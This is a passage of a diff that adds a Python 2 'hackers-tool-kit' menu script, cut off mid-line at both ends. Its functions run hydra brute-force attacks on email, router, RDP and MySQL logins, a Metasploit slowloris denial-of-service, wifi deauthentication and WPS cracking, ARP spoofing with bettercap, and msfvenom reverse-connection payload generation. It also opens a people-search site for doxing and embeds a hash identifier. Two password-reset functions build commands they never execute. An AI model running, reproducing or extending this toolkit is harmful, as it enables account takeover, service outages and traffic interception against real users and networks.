raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 